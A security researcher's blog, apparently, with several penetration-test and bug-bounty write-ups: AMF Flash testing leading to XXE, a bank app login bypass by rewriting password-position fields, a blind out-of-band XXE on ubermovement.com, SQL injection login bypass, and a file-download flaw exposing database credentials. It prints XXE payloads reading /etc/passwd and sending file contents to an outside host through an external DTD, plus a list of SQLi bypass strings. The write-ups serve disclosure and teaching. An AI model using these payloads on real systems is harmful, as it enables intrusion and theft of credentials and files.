Saturday, 12 October 2019

Getting started with AMF Flash Application Penetration Testing !

What is Action Message Format (AMF) ? TL;DR;
AMF is a binary message serialization format geared for remote procedure calls, native to the Adobe Flash Player and Adobe Integrated Runtime. There are two versions of the format, AMF0 and AMF3. AMF3 is more compact than AMF0, and and supports data types that are available only in ActionScript 3.0, such as ByteArray. 

Tools Required :
1. Burpsuite < Download >
2. amf-deserializer Burpsuite Extender Plugin < Download
3. Blazer Burpsuite Extender Plugin  < Download >

Testing Approach :
Step 1. Intercept AMF request or procedure calls using burpsuite.
Step 2. Decode AMF objects using amf-deserializer.
Step 3. Create new requests via converting AMF request to XML using amf-deserializer.
Step 4. Once the request is created import XML requests in burp suite repeater.
Step 5. Now, once you see all XML parameters via clicking on XML tab. One can use those parameters as entry/injection points for further web application attacks(SQL, LFI, XSS etc. manual tests)
Step 6. Automate security tests using Burpsuite scanner or Blazer extender for burpsuite.   

A Penetration Testing #TrueStory - XML External Entity (XXE) Bugs to rescue : 
Recently me and my team was requested to perform external and internal security audit for an organization. The organization which we were going to test was very updated in cyber security field. They have a process of doing 360 security audits quarterly with various precaution taken like IDS, WAF, FW and Honeypots installed for there networks and applications. Our team was assigned task to perform external as-well-as internal penetration testing of there netwoks and applications. As my expertise is more in Application Security I took apps testing part where as network assessment part wask taken by my team.

After four weeks of assessment, we started sharing our finding to client. Nework assessment was going great as team was able to find out many unpatched and outdated systems, softwares, packages in network. On other hand application security assessment was not going good as planned because I was unable to find any Critical or High severity vulnerabilities. 

Deadline was near to submit final report so I started working on a report. While working on a report I opened my burpsuite session for one of the application to calculate number of links, parameters etc... and suddenly I relaised I have made a biggest mistake...!

Figure 1. The Mistake

The mistake was, I forgot to filter out "Flash files" & "Other Binary". On checking the checkbox I found various filetype like SVG, AFM, ZIP etc. added to my burp session.

  Figure 2. Rectification of mistake

After analysing updated files in my session, I sorted out AFM flash application files and quickly downloaded and installed the "amf-deserializer Burpsuite Extender Plugin" in my brupsuite to decode the AMF file content and extract some juicy informations.


  Figure 3. amf-deserializer project

1. Download the  amf-deserializer project and extract it in some folder.
2. Open burpsuite
3. Navigate to Extender tab and add the java file "\amf-deserializer-master\executables\AMFDSer-ngng.jar"


  Figure 4. Inporting AMFDSer-ngng.jar

4. Load the AMFD plugin

   Figure 5. Loading AMFDSer-ngng.jar

Once the plugin is loaded succesfully you will see the "Deserialized AMF" tab in whick you can see the AMF object decoded in XML format.

Now, I converted all AMF objects to XML requests and started my security tests using burpsuite and Blazer.

A. AMF Request 

Figure a. AMF Request
B. Deserialized AMF

Figure b. Deserialized AMF

1. Download Blazer


   Figure 6. Blazer project

2. Navigate to Extender tab then BApps Store and Import Blazer.
 

  Figure 7. Loading Blazer

3. For automating the tests using blazer - right click on AMF request and click on "Blazer - AMF testing" option. 
 

   Figure 8. Automating test using Blazer

As I was having less time to test this application I used burp scanner to automate security tests for converted AMF requests.

Figure 9. Burpsuite scanner result

After an hour of automation I got alerts for XXE Injection. For exploiting XXE injection I used converted AMF request's XML parameters and created a new XML request in repeater.

Steps to Reproduce XXE Exploitation :
1. Send vulnerable AFM request to repeater.
2. Navigate to Deserialized AMF tab and in XML content set XXE payload in XML parameters(Entry points/Injection Points)
3. Then, re-play the request.





Figure 10. Creating vulnerable request 


Figure 11. Vulnerable request response


And finally my assessment was finished as I found more critical and high severity vulnerabilities like SQLi, XSS & OTP bruteforce in application via manupluating converted AMF request's XML's parameters.

Tuesday, 15 May 2018

Less Time To Perform Penetration Tests ? Look For Known Bugs...!!


August 1St 2017 Evening, 

I was having my evening tea as few hours left for a day off and suddenly I was assigned a new task by my manager. He rush down to me and said dear Raghav, you have to perform a quick security tests on particular website ABC and its sub-domain. Try to wrap it up in an hour or two. Find any critical or high bug and make the incident report so we can impress our client and buy proper time to perform security assessments.

The moment I received E-mail related to project, My first move was to search for sub-domains so I use following techniques like Google/Bing search operators, reverse IP lookups, dnsdumpster.com, Knock Sub-domain Scan and Acunetix Sub-domain Scanner.


Fig.1 Sub-domain Scanning


As I made the list of sub-domains, I quickly opened Firefox web browser then installed Wappalyzer Addon and  stated looking for technologies and there versions for various domain. After 10 minutes I was finished with technology version mapping with targeted domains. After giving some thoughts I selected two domains which was running Java & Oracle Commerce now my move was to search for known vulnerability for these technologies as there version was disclosed and it would be easiest play to exploit them in less amount of time.

To achieve this I have two options to first the hard way start search for vulnerabilities in nvd.nist.gov, cve.mitre.org, www.cvedetails.com or www.exploit-db.com & second create a profile for java and oracle vulnerabilities in Acunetix web Scanner and crawl and scan the website.

So choose option two and created a profile for oracle and java vulnerabilities.




Fig.2 Profile Creation

Now, I crawled whole both website manually using Acunetix HTTP Sniffer and imported both in my scan with new created scan profile. With In 5 Minutes I got two critical alerts from both Scans.

First : Oracle Report rwservlet vulnerabilities


Fig.3 rwservlet vulnerabilities


Second : Weblogic Server Side Request Forgery


Fig.4 Weblogic SSRF


Now I have to confirm whether the alerts are False positive or negative. After doing some research on " Oracle Report rwservlet vulnerabilities" I came across direct exploit in Exploit-DB as Oracle Reports CVE-2012-3153 and Rapid 7 - Metasploit Oracle Forms and Reports Remote Code Execution.


Fig.5 OS Shell


Next for Weblogic Server Side Request Forgery I set up a server and enabled access.logs. with help of Acunetix HTTP Editor I replayed the vulnerable request with payload as my server IP and started monitoring the requests.

Fig.6 Out Of Band Calls


Finally I was had two positive critical vulnerabilities, with sufficient time to make a incident report...;)

Thursday, 6 July 2017

Logical Authentication Bypass Vulnerability

28th September 2015 morning I received an Email from my colleague, Email says to perform a Penetration Test on Android Application of a Bank called "ABC" (For security reasons not disclosing the name of the Application). Time limit was short as I have to complete the test & report in 2 days. So I looked for Critical vulnerability. One day passed & I checked for maximum Injections & Session managements vulnerability but there was no luck.

After giving some thought to the application I lose hope & started making report suddenly I my eye have a glimpse of Authentication Request that was going to Server.

Now, for understanding the request you have to understand the login functionality of the application. So developers of this app was trying to be smart as they were asking for Password & Memorable Keyword at the time of registration, for access your account in the app using some security policy like :
1. At least 8 characters password.
2. Password must contain One Upper Letter & One Lower Letter. 

But at the time of login the developers thought it will be more secure if the app ask for these three conditions for successful signin to account:
1. Email ID
2. 3-Given Positions Of Memorable Keyword

3. 3- Given Positions Of Password


The security trick used by developers was great but on the other hand its weaken the password & Memorable Word strength from 8 character to 3 random character.

so, as the characters was less 3 memorable words & password that can be Brute force easily like its only takes 26x26x26 permutation & combinations but matching with each other may took days. So brute forcing was not the plan.

Now, Find The Bug...!!!

The authentication request was showing :
1. Email ID
2. 3-Given Positions Of Memorable Keyword
3. 3- Given Positions Of Password

But, the developers biggest mistake was, The request was also showing places <PINSeq>{3,4,7} & <PwDSeq> {2,3,5} in the request.


Automatically a thought came to my mind what If I change the  <PINSeq>{3,4,7} & <PwDSeq> {2,3,5} to <PINSeq>{1,1,1} & <PwDSeq> {1,1,1} so I forged the same Request with <PIN>{1,1,1} & <PwDSeq> {1,1,1}  followed by Memorable word and Password  <PIN>qqq & <PwD>qqq  then send it to the server, as my test account password was :
MW : qWerty123
PW :  queEn123

so, first position of the memorable word & password will be "q"  hence <PIN>qqq & <PwD>qqq 
After forwarding the request to the server I got 200 OK Response & Boolean True in Response.


So Finally My test was successful & my problem was solved of permutation & combination of 26x26x26 memorable words & password matching....

As I am successfully able to edit sequence, I can fixed it to place 1,1,1 means first letter of password & memorable word.

Now only my task was to find 3 letter password & Memorable word  that automatically become easy because as the sequence / place of password & Memorable word was 1,1,1  I only have to find 26+26 password & Memorable word.

Eg. Position 1,1,1 is fixed for password & Memorable word
& victim password & Memorable word always starts with letter :
{ a,b,c,d,e,f,g,h,i,j,h,i,j,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z }
so, I have to brute force place like :
{aaa,bbb,ccc,ddd,eee,fff,ggg,hhh,iii,jjj,kkk,lll,mmm,nnn,ooo,ppp,qqq,rrr,sss,ttt,uuu,
vvv,www,xxx,yyy,zzz}

Now, thinking of this logic I took Burp Suite Intruder tool for my benefit...
Firstly I requested my test account handler to change the Password so I can test my Authentication bypass theory.

Then,

1. I forward the original request to Intruder with victim Email ID.
2. Changed the pin sequence <PINSeq>{1,1,1} & <PwDSeq> {1,1,1}


3. mark the place & add payload from a,b,c,..........z


4. Launch the 26 character brute-force attack for first letter of Memorable word...


Response was 200 OK with Boolean True at <IsPinValid>


SO, The new Memorable word was clear, it was "c,c,c" = "c"

5. Launch the 26 character brute-force attack for first letter of Password...


Response was 200 OK with Boolean True at <IsPwdValid>


SO, The new Password's first letter was "r,r,r" = "r"

6. Now finally I have the first letter of Memorable word & password, "c" & "r" Respectively. So I started login to the app. At login page I intercept the HTTP Request & edit all the information pin sequence <PINSeq>{3,4,7} & <PwDSeq> {2,3,5} to <PINSeq>{1,1,1} & <PwDSeq> {1,1,1} followed by memorable word <pin>ccc<pin> & password <pwd>rrr</pwd>
and forward the request to server.....


Got 200 OK In Response with Boolean <IsPINValid>true</IsPINValid> & <IsPwdValid>true</IsPwdValid>

Successful Login ....:)



Thanks...!!!!!!


-Raghav Bisht

Friday, 5 August 2016

Blind OOB XXE At UBER 26+ Domains Hacked.

XXE (XML External Entity) :
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

This is the story of how I was able to find XXE in one of the UBER'S Website that was in Bug Bounty Program Scope.

On July 26th 2016 Evening I was working on domain ubermovement Web Application.
As it was a small webapp there were no too much parameter to run injections tests. I started the old school tests and the first parameter I came across was the Search Box.


Now, I Attached my Burp Suite then gave a keyword to search and started monitoring the requests...

In Directory "search" I got two requests.
1.The Keyword I searched : http://ubermovement.com/api/search/GeneralSearch?crumb=ASmuamNBJiP4eyC3qpXZWu87i5X6PWGh&q=cat&p=0
2. http://ubermovement.com/api/search/GeneralSearch


Now , For the first request I started the attacks like XSS, SQL, XPATH, XXE, command injections many more.....

But they all failed and I didn't find any vulnerability.

Now I started my tests with second request...

As there were no parameters so, I Send the request to Repeater and started looking for Directory Based Vulnerabilities.

 
Then, As my all other Injection tests failed lastly I started looking for XXE.

So, First thing I does to change the Request Method to POST and check the response.



As the Response was same as GET Request so I Added the Content-type Header as application/xml
and basic XML Code with "GeneralSearch" as search parameter then checked for Response.
<?xml version="1.0" encoding="utf-8"?>
<GeneralSearch>cat</GeneralSearch>


The Response was shocking as I got the XML Error.

Now I was about 60% sure that it could lead to XXE. SO, I started the Blind Test for XXE...
with different payloads...
Eg.

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<GeneralSearch>&xxe;</GeneralSearch>

But Still no luck all I was getting the XML Error in response....

Now, I thought lets check the vulnerability via OOB (Out-of-band) Method and perform a Ping Test.

So,
step-1 : I downloaded XAMPP and hosted a Apache Server.
step-2 : I Port forward my IP to port 80 so I can access my server via my Public IP from different networks.
step-3 : I Edited XXE Payload to :

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/">
]>
<GeneralSearch>&dtgmlf6ent;</GeneralSearch> 

step-4 : Started the attack and got the error.


step-5 : I checked my server logs and I got a perfect ping from vulnerable application.




Now, the manual test confirms the vulnerability so I scanned the particular vulnerable request via Acunetix and it detected the vulnerability.


 
Then I Report the Bug First and then started doing further tests with .dtd payloads.

Its turn out to be the various sub-domain for .*ubermovement.com was having the same flaw.

Google Dork : site:ubermovement.com "/search/"



Original HackerOne Report #154096

Test Summary :

POST data was set to <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/"> ]> <GeneralSearch>&dtgmlf6ent;</GeneralSearch>
An HTTP request was initiated for the domain http://0.0.0.0/ which indicates that this script is vulnerable to XXE injection.
NOTE : As it was Blind XXE Test I was Successful in Ping Test for XXE. But unable to retrieve any sensitive information.

HTTP request details:

IP address: 8.36.86.67
User agent: Java/1.8.0_60

Vulnerable Domain :

Vulnerable Link :

Vulnerable Parameter :

GeneralSearch

Steps To Reproduce :

  1. Go to website : http://ubermovement.com/
  2. Attach burp Suite & start intercepting now, click on search and search...
  3. Grab the GET request

    Eg. Original HTTP Request :

    GET /api/search/GeneralSearch HTTP/1.1
    Host: ubermovement.com
    Accept: /
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
  4. NOW,
Send request to repeater & change it to POST.

Eg. Original HTTP Request :

POST /api/search/GeneralSearch HTTP/1.1
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
  1. Now Add content type : Eg. Content-type: application/xml

Request will be:

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
  1. Deploy web server and host "payload.dtd" File eg :

    payload.dtd :

    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://xxe.me/content?%file;'>">
    %all;
  2. Now Add XXE Payload For confirmation :
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE roottag [ 
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://0.0.0.0/payload23.dtd">
    %dtd;]>
    <GeneralSearch>&send;</GeneralSearch>

Request Will Be :

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 214
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [ 
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd">
%dtd;]>
<GeneralSearch>&send;</GeneralSearch>
NOTE : If you view your web server logs you will find a 404 error.

Wednesday, 11 May 2016

That Moment When You Find Authentication Bypass Vulnerability In Bug Bounty Program ?

One whole year has passed, since I joined bug bounty program on various platforms and all I could find was hand full of XSS, XFS,CSRF,CRLF Vulnerability with 2 to 3 logical bugs  and about millions of duplicates...

22nd Dec 2015 Evening I started looking for sub domains of a website that was newly introduced to bug bounty program. After fingerprinting all domains I found a unique domain in which was hosted on IIS Server & running ASP.Net technology at back end. Nmap Scan gave me the version of server & technology. Web Application was running on Windows Server 2003, Microsoft IIS 6.0 with Microsoft SQL Server 2005. That was too old for 2015 technologies, so I go OLD School on one of the parameter of page for search for SQL Injection.


I injected a Quote and in few seconds I received a SQL Error. Now I was sure the SQL Vulnerability was present in this sub-domain. As It was a sub-domain the severity of the bug was less so my main job was to find as many unique sql bugs in the web application. 

The second thought came to my mind was check for All SQL Injection so I gave the Web App the Automated SQL Scan.


After a full scan of web application all I found was 3 Unique Parameter with SQL Bug. But luckily 2 parameters were "Email" & "Password". After seeing them I got an idea for bypassing the Authentication via SQLi. So, know I was able to report two different types of bug.
1. Authentication Bypass via SQLi
2. Error Based SQL Injection.

Now comes the POC Part for both. Exploiting Error Based SQL Injection was easy, If you know how to perform the attack or alternative you can use modern day automated injection tools for creating POC. So I used SQLMap for creating POC for Error based SQL Injection.
   


Now, Creating POC for Authentication Bypass via SQLi...
1. I opened Admin Login Page.


2. Intercepting the Authentication Request Via Burp Suite.


3.  I started brute forcing with different SQLi payloads list goes like :
' or ' 1 ' = ' 1
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

& in the end payload : 'or' '='
wooooooooooo..... at last its worked for me.

So, Finally my both POC was created and successfully received some good amount Bug Bounty for my both Reports.

- Raghav

Tuesday, 3 May 2016

Old School Source Code Disclosure Vulnerability

On May 2nd I started a revaluation of web application for a client. While doing revaluation I found out that they have added some more functions in web app, I started exploring the new features of app every things look fine as they where all static HTML page then suddenly I came across a file "filedownload.php".

Now, my first step was to spider this branch that I did with help of burp suite & the full link was "http://site.com/filedownload.php?file=E:\netpub\vhosts\www\httpdocs/journal/welcome.pdf"

The Path Of Application was disclosed : E:\netpub\vhosts\www\

Then, I simply run the link "http://site.com/filedownload.php?file=" on my browser & I Received a error message from server that :
"ERROR: download file NOT SPECIFIED. USE forcedownload.php?file=filepath"

The moment I saw that error I remember it may be old school GHDB type file download vulnerability so, now I have to check for two type of Vulnerability :
1. LFI - Local File Inclusion
2. Source Code Disclosure

So after doing some Directory Traversal attacks I was sure that LFI was not applicable.

Then I started looking for Web.Config File as the server was working on Windows IIS.
"http://site.com/filedownload.php?file=web.config" the link works but no luck as the file was empty.


Then I, Looked for "index.php" file as many web developers sets there database connection password in "index" file "http://site.com/filedownload.php?file=index.php". Luckily I was able to download the index file but still the password was not present.


But, I get a hint a file name "UserUtils.php" was linked to the "index.php" file.
So, I started searching for "UserUtils.php" in all available paths I knew. After some hard work I located file inside "E:\netpub\vhosts\www\htdocs\UserUtils.php" Full Link :
"http://site.com/filedownload.php?file=E:\netpub\vhosts\www\htdocs\UserUtils.php"
 & file contains SMTP Server's Administrator Email ID , UserName , Password etc...

 
 But Sill I was not done, I have to find the Database Credentials so, After reading the whole file I found a New Path which have configuration file "admin/include/config.php" & "admin/include/functions.php"

Now, I tried to download Configuration file "http://site.com/filedownload.php?file=admin/include/config.php"


& Cheers I was able to see the Database Credentials as they were in plaintext.

Similar Type Of Attack Video Tutorial : https://www.youtube.com/watch?v=gjREfF5C4RQ

Thanks,


-Raghav Bisht

Getting started with AMF Flash Application Penetration Testing !

What is Action Message Format (AMF) ? TL;DR; AMF is a binary message serialization format geared for remote procedure calls, native to the...